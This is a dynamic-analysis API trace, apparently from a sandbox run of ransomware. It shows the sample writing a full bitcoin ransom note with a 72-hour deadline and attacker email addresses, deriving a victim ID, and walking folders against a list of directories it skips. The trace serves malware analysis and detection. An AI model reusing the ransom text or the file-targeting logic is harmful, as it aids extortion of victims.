	[0177.516] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.516] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0177.518] CloseHandle (hObject=0x384) returned 1
	[0177.519] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.519] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.519] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.519] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0177.521] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.521] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Live\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows live\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.521] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.522] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.522] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0177.522] CloseHandle (hObject=0x384) returned 1
	[0177.522] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Live\\*.*" (normalized: "c:\\users\\all users\\microsoft\\windows live\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x8356bc91, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0177.522] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows Live\\*.*") returned 45
	[0177.523] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.523] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Windows Live\\*.*", cchLength=0x2d | out: lpsz="c:\\users\\all users\\microsoft\\windows live\\*.*") returned 0x2d
	[0177.523] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\windows live\\*.*", lpSrch="windows") returned="windows live\\*.*"
	[0177.523] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0177.523] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~3")) returned 1
	[0177.523] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1
	[0177.524] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1
	[0177.524] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0177.524] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0177.524] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="Windows NT" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT") returned="C:\\Users\\All Users\\Microsoft\\Windows NT"
	[0177.524] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT") returned="C:\\Users\\All Users\\Microsoft\\Windows NT"
	[0177.524] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\"
	[0177.524] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\"
	[0177.524] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*"
	[0177.524] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.527] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*") returned 43
	[0177.527] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.527] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\microsoft\\windows nt\\*.*") returned 0x2b
	[0177.527] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.528] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\windows nt\\*.*", lpSrch="windows") returned="windows nt\\*.*"
	[0177.528] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.528] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT") returned="C:\\Users\\All Users\\Microsoft\\Windows NT"
	[0177.528] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*"
	[0177.528] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.528] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.528] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows NT\\HELP_DECRYPT_YOUR_FILES.TXT") returned 67
	[0177.528] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.533] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.533] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.536] CloseHandle (hObject=0x384) returned 1
	[0177.536] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.537] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0177.538] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.538] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.538] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.538] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.538] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0177.539] CloseHandle (hObject=0x384) returned 1
	[0177.539] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.539] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.539] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.539] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows NT\\HELP_DECRYPT_YOUR_FILES.HTML") returned 68
	[0177.540] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.544] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.544] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0177.546] CloseHandle (hObject=0x384) returned 1
	[0177.546] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.547] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.547] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.547] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0177.548] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.548] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.549] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.549] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.549] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0177.549] CloseHandle (hObject=0x384) returned 1
	[0177.549] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x835b7cb9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.550] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*") returned 43
	[0177.550] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.550] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Windows NT\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\microsoft\\windows nt\\*.*") returned 0x2b
	[0177.550] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.550] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\windows nt\\*.*", lpSrch="windows") returned="windows nt\\*.*"
	[0177.550] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.551] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMSIPC", cAlternateFileName="")) returned 1
	[0177.551] lstrcmpW (lpString1="WinMSIPC", lpString2="..") returned 1
	[0177.551] lstrcmpW (lpString1="WinMSIPC", lpString2=".") returned 1
	[0177.551] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0177.551] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0177.551] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="WinMSIPC" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC"
	[0177.551] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\WinMSIPC" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC"
	[0177.551] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\"
	[0177.551] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\"
	[0177.552] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\*.*") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\*.*"
	[0177.552] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\*.*" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0177.553] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\*.*") returned 41
	[0177.554] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.554] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\*.*", cchLength=0x29 | out: lpsz="c:\\users\\all users\\microsoft\\winmsipc\\*.*") returned 0x29
	[0177.554] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.554] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="windows") returned 0x0
	[0177.554] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.554] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="boot") returned 0x0
	[0177.554] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.555] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="system volume information") returned 0x0
	[0177.555] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.555] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.555] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.555] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="temp") returned 0x0
	[0177.555] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.556] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="program files") returned 0x0
	[0177.556] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.556] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.556] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.556] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="appdata") returned 0x0
	[0177.556] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.556] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="application data") returned 0x0
	[0177.556] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.557] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="winnt") returned 0x0
	[0177.562] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.562] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="tmp") returned 0x0
	[0177.562] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.562] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="cache") returned 0x0
	[0177.563] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.563] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.563] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.563] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="webcache") returned 0x0
	[0177.563] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.563] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="inetcache") returned 0x0
	[0177.563] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.563] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="nvidia") returned 0x0
	[0177.564] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.564] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="packages") returned 0x0
	[0177.564] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.564] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="cookies") returned 0x0
	[0177.564] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.564] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="programdata") returned 0x0
	[0177.564] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
